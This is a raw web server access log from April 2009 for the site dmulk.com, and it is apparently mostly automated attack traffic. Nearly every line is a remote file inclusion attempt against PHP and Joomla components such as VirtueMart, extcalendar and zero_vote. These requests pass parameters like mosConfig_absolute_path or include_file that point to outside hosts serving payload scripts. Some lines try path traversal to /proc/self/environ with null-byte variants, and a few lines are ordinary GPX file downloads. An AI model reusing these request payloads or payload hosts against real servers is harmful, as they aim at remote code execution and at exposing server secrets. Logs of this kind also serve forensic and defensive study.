64.157.4.41 - - [28/Apr/2009:10:51:26 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:10:51:27 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
222.239.76.25 - - [28/Apr/2009:10:51:29 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.76.25 - - [28/Apr/2009:10:51:29 -0700] "GET /logs/access_090408.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.76.25 - - [28/Apr/2009:10:51:29 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.76.25 - - [28/Apr/2009:10:51:35 -0700] "GET /logs/access_090415.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.240.39.230 - - [28/Apr/2009:10:51:36 -0700] "GET /index.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.abclove.us//technote7/data/member/fx1?? HTTP/1.1" 200 43437 "-" "Mozilla/5.0" "www.dmulk.com"
219.240.39.230 - - [28/Apr/2009:10:51:50 -0700] "GET /index.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.abclove.us//technote7/data/member/fx1?? HTTP/1.1" 200 43437 "-" "Mozilla/5.0" "www.dmulk.com"
219.240.39.230 - - [28/Apr/2009:10:51:52 -0700] "GET /index.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.abclove.us//technote7/data/member/fx1?? HTTP/1.1" 200 43437 "-" "Mozilla/5.0" "www.dmulk.com"
221.141.3.98 - - [28/Apr/2009:10:51:53 -0700] "GET /logs/access_080523.log/page.php?doc=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
221.141.3.98 - - [28/Apr/2009:10:51:53 -0700] "GET /page.php?doc=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
221.141.3.98 - - [28/Apr/2009:10:51:53 -0700] "GET /logs/page.php?doc=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
221.141.3.98 - - [28/Apr/2009:10:51:53 -0700] "GET /logs/access_080528.log/page.php?doc=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
221.141.3.98 - - [28/Apr/2009:10:51:53 -0700] "GET /logs/access_080523.log/errors.php?error=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
221.141.3.98 - - [28/Apr/2009:10:51:53 -0700] "GET /logs/access_080528.log/errors.php?error=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
221.141.3.98 - - [28/Apr/2009:10:51:53 -0700] "GET /errors.php?error=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
221.141.3.98 - - [28/Apr/2009:10:51:53 -0700] "GET /logs/errors.php?error=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
221.141.3.98 - - [28/Apr/2009:10:51:54 -0700] "GET /logs/access_080523.log/page.php?doc=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
221.141.3.98 - - [28/Apr/2009:10:51:54 -0700] "GET /logs/access_080528.log/page.php?doc=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
221.141.3.98 - - [28/Apr/2009:10:51:54 -0700] "GET /page.php?doc=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
221.141.3.98 - - [28/Apr/2009:10:51:54 -0700] "GET /logs/page.php?doc=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
221.141.3.98 - - [28/Apr/2009:10:51:54 -0700] "GET /logs/access_080523.log/page.php?doc=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
221.141.3.98 - - [28/Apr/2009:10:51:54 -0700] "GET /logs/access_080528.log/page.php?doc=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
221.141.3.98 - - [28/Apr/2009:10:51:54 -0700] "GET /page.php?doc=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
221.141.3.98 - - [28/Apr/2009:10:51:54 -0700] "GET /logs/page.php?doc=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:10:51:55 -0700] "GET /logs/modifyform.html?code=http://http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:10:51:56 -0700] "GET /logs/access_071224.log/modifyform.html?code=http://http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:10:51:57 -0700] "GET /logs/access_080621.log/modifyform.html?code=http://http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:10:51:57 -0700] "GET /modifyform.html?code=http://http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
220.79.47.122 - - [28/Apr/2009:10:52:01 -0700] "GET /home.php?pagina=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [28/Apr/2009:10:52:01 -0700] "GET /logs/home.php?pagina=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [28/Apr/2009:10:52:01 -0700] "GET /logs/access_081202.log/home.php?pagina=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:10:52:01 -0700] "GET /logs/modifyform.html?code=http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:10:52:01 -0700] "GET /modifyform.html?code=http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:10:52:01 -0700] "GET /logs/access_080621.log/modifyform.html?code=http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:10:52:01 -0700] "GET /logs/access_071224.log/modifyform.html?code=http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
220.79.47.122 - - [28/Apr/2009:10:52:05 -0700] "GET /logs/access_080806.log/home.php?pagina=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.164.230 - - [28/Apr/2009:10:52:07 -0700] "GET /includes/include_once.php?include_file=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.164.230 - - [28/Apr/2009:10:52:07 -0700] "GET /logs/includes/include_once.php?include_file=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.164.230 - - [28/Apr/2009:10:52:07 -0700] "GET /logs/access_080131.log/includes/include_once.php?include_file=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:10:52:11 -0700] "GET /logs/access_080722.log%20%20//?commonpath=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.164.230 - - [28/Apr/2009:10:52:12 -0700] "GET /includes/include_once.php?include_file=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.164.230 - - [28/Apr/2009:10:52:12 -0700] "GET /logs/includes/include_once.php?include_file=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.164.230 - - [28/Apr/2009:10:52:12 -0700] "GET /logs/access_080131.log%20%20/includes/include_once.php?include_file=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [28/Apr/2009:10:52:17 -0700] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [28/Apr/2009:10:52:17 -0700] "GET /logs/access_081105.log//components/com_virtuemart/export.php?mosConfig_absolute_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [28/Apr/2009:10:52:17 -0700] "GET /components/com_virtuemart/export.php?mosConfig_absolute_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.164.230 - - [28/Apr/2009:10:52:43 -0700] "GET /logs/includes/include_once.php?include_file=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.164.230 - - [28/Apr/2009:10:52:43 -0700] "GET /includes/include_once.php?include_file=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.164.230 - - [28/Apr/2009:10:52:43 -0700] "GET /logs/access_080131.log/includes/include_once.php?include_file=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.18 - - [28/Apr/2009:10:52:53 -0700] "GET /logs/access_071214.log//_head.php?_zb_path=http://208.98.22.241/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.18 - - [28/Apr/2009:10:52:53 -0700] "GET /logs//_head.php?_zb_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.18 - - [28/Apr/2009:10:52:53 -0700] "GET /_head.php?_zb_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:10:52:56 -0700] "GET /logs/access_090324.log%20%20//?commonpath=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:10:53:04 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
72.55.164.230 - - [28/Apr/2009:10:53:05 -0700] "GET /logs/access_080520.log/includes/include_once.php?include_file=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.164.230 - - [28/Apr/2009:10:53:11 -0700] "GET /logs/access_080520.log%20%20/includes/include_once.php?include_file=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:10:53:19 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
77.221.130.18 - - [28/Apr/2009:10:53:32 -0700] "GET /logs/access_080331.log//_head.php?_zb_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.164.230 - - [28/Apr/2009:10:53:36 -0700] "GET /logs/access_080520.log/includes/include_once.php?include_file=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.73.2 - - [28/Apr/2009:10:53:53 -0700] "GET /index.php?pageurl=http://www.wat-is.info//content/download/test.txt?? HTTP/1.1" 200 43325 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
124.0.73.2 - - [28/Apr/2009:10:54:41 -0700] "GET /lib/gore.php?libpath=http://www.wat-is.info//content/download/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
124.0.73.2 - - [28/Apr/2009:10:54:41 -0700] "GET /logs/lib/gore.php?libpath=http://www.wat-is.info//content/download/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
219.240.39.230 - - [28/Apr/2009:10:55:04 -0700] "GET /logs/access_080303.log%20%20//index.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.abclove.us//technote7/data/member/fx1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [28/Apr/2009:10:55:08 -0700] "GET /logs/access_090118.log%20%20/home.php?pagina=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:10:55:10 -0700] "GET //skin/zero_vote/error.php?%20dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:10:55:10 -0700] "GET /logs///skin/zero_vote/error.php?%20dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:10:55:10 -0700] "GET /logs/access_071214.log%20%20///skin/zero_vote/error.php?%20dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [28/Apr/2009:10:55:19 -0700] "GET /logs/access_080806.log%20%20/home.php?pagina=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:10:55:22 -0700] "GET /logs/access_081129.log//?commonpath=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.240.39.230 - - [28/Apr/2009:10:55:36 -0700] "GET /logs/access_080303.log%20%20//index.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.abclove.us//technote7/data/member/fx1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.240.39.230 - - [28/Apr/2009:10:55:47 -0700] "GET /logs/access_080303.log%20%20//index.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.abclove.us//technote7/data/member/fx1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
24.56.170.228 - - [28/Apr/2009:10:55:52 -0700] "GET /logs/access_081008.log%20%20/errors.php?error=http://www.sanbokyodan.fr/editor/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.103.16.43 - - [28/Apr/2009:10:57:12 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.wizard.com.br/id.txt?? HTTP/1.1" 200 97193 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.42 - - [28/Apr/2009:10:57:25 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.42 - - [28/Apr/2009:10:57:40 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
216.104.37.122 - - [28/Apr/2009:10:57:50 -0700] "GET /logs/access_081212.log//export.php?mosConfig_absolute_path=http://data.donkeyhote.co.kr/xsl/copyright.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
216.104.37.122 - - [28/Apr/2009:10:57:50 -0700] "GET /export.php?mosConfig_absolute_path=http://data.donkeyhote.co.kr/xsl/copyright.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
216.104.37.122 - - [28/Apr/2009:10:57:51 -0700] "GET /logs//export.php?mosConfig_absolute_path=http://data.donkeyhote.co.kr/xsl/copyright.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
200.103.16.43 - - [28/Apr/2009:10:58:00 -0700] "GET /?path%5Bdocroot%5D=http://www.wizard.com.br/id.txt?? HTTP/1.1" 500 292 "-" "libwww-perl/5.805" "www.dmulk.com"
94.23.192.43 - - [28/Apr/2009:10:59:13 -0700] "GET /logs/access_081212.log//export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.23.192.43 - - [28/Apr/2009:10:59:13 -0700] "GET /export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.23.192.43 - - [28/Apr/2009:10:59:14 -0700] "GET /logs//export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.112.90.164 - - [28/Apr/2009:10:59:15 -0700] "GET /logs/common/func.php?CommonAbsDir=http://xpoison.ucoz.ru/bid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
140.112.90.164 - - [28/Apr/2009:10:59:15 -0700] "GET /logs/access_090212.log/common/func.php?CommonAbsDir=http://xpoison.ucoz.ru/bid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
140.112.90.164 - - [28/Apr/2009:10:59:15 -0700] "GET /common/func.php?CommonAbsDir=http://xpoison.ucoz.ru/bid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.192.43 - - [28/Apr/2009:10:59:27 -0700] "GET /logs/access_081212.log//export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.23.192.43 - - [28/Apr/2009:10:59:28 -0700] "GET /export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.23.192.43 - - [28/Apr/2009:10:59:28 -0700] "GET /logs//export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.54.239.74 - - [28/Apr/2009:10:59:33 -0700] "GET /logs/access_080615.log%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://algol.u-strasbg.fr/~jcame//selops/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.239.74 - - [28/Apr/2009:10:59:33 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://algol.u-strasbg.fr/~jcame//selops/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.239.74 - - [28/Apr/2009:10:59:33 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://algol.u-strasbg.fr/~jcame//selops/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.239.74 - - [28/Apr/2009:10:59:37 -0700] "GET /logs/access_081208.log%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://algol.u-strasbg.fr/~jcame//selops/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.46.92.16 - - [28/Apr/2009:10:59:55 -0700] "GET /minamijewelry/html/images/jewelry/K5t.jpg HTTP/1.1" 200 3650 "-" "LWP::Simple/5.814" "dmulk.com"
174.133.83.130 - - [28/Apr/2009:10:59:56 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.walkersgameear.com/email/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
174.133.83.130 - - [28/Apr/2009:10:59:56 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.walkersgameear.com/email/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
174.133.83.130 - - [28/Apr/2009:10:59:56 -0700] "GET /logs/access_080615.log%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.walkersgameear.com/email/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
174.133.83.130 - - [28/Apr/2009:10:59:56 -0700] "GET /logs/access_081208.log%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.walkersgameear.com/email/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:11:00:14 -0700] "GET /logs/access_071214.log%20%20///skin/zero_vote/login.php?%20dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:11:00:14 -0700] "GET //skin/zero_vote/login.php?%20dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:11:00:17 -0700] "GET /logs///skin/zero_vote/login.php?%20dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [28/Apr/2009:11:00:19 -0700] "GET /logs/access_080406.log%20%20/avatar.php?page=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [28/Apr/2009:11:00:19 -0700] "GET /avatar.php?page=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [28/Apr/2009:11:00:19 -0700] "GET /logs/access_080406.log/avatar.php?page=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [28/Apr/2009:11:00:19 -0700] "GET /logs/avatar.php?page=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [28/Apr/2009:11:00:19 -0700] "GET /logs/access_080828.log/avatar.php?page=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [28/Apr/2009:11:00:25 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [28/Apr/2009:11:00:29 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [28/Apr/2009:11:00:29 -0700] "GET /logs/access_080120.log/akocomments.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [28/Apr/2009:11:00:29 -0700] "GET /logs/access_080128.log/akocomments.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
163.24.136.10 - - [28/Apr/2009:11:00:39 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.koreavan.kr/technote6//data/id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
163.24.136.10 - - [28/Apr/2009:11:00:48 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.koreavan.kr/technote6//data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
163.24.136.10 - - [28/Apr/2009:11:00:48 -0700] "GET /logs/access_081119.log%20%20//skin/zero_vote/ask_password.php?dir=http://www.koreavan.kr/technote6//data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.47.237.161 - - [28/Apr/2009:11:00:52 -0700] "GET /logs/access_081012.log//index.php?DOCUMENT_ROOT=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/statict/xml/copyright.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.47.237.161 - - [28/Apr/2009:11:00:52 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/statict/xml/copyright.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [28/Apr/2009:11:01:03 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:11:01:15 -0700] "GET /logs/access_080331.log%20%20///skin/zero_vote/login.php?%20dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [28/Apr/2009:11:01:18 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
216.104.37.122 - - [28/Apr/2009:11:01:33 -0700] "GET /export.php?mosConfig_absolute_path=http://data.donkeyhote.co.kr/xsl/copyright.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
72.47.237.161 - - [28/Apr/2009:11:01:43 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/statict/xml/copyright.gif?? HTTP/1.1" 200 43413 "-" "Mozilla/5.0" "www.dmulk.com"
72.82.228.83 - - [28/Apr/2009:11:02:06 -0700] "GET /logs/access_090112.log/errors.php?error=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.82.228.83 - - [28/Apr/2009:11:02:06 -0700] "GET /logs/errors.php?error=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.82.228.83 - - [28/Apr/2009:11:02:06 -0700] "GET /logs/access_081116.log/errors.php?error=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.82.228.83 - - [28/Apr/2009:11:02:06 -0700] "GET /errors.php?error=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
